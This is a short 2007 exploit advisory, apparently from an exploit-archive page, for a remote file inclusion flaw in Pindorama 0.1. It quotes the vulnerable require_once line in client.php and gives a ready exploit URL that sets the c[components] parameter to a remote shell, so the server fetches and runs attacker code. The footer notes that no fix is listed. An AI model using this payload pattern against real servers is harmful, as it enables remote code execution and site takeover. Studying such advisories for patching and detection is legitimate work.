Pindorama 0.1 client.php Remote File Inclusion Vulnerability

2007-10-11 00:00:00

\\\|///
\\ - - // Xmors Underground Group
( @ @ )

----oOOo--(_)-oOOo--------------------------------------------------
Portal : Pindorama 0.1
Download : http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : [email protected] / [email protected]
Dork : :(

----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

require_once($c["components"]."xmlrpc/common.php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

#

Fixes

No fixes

In order to submit a new fix you need to be registered.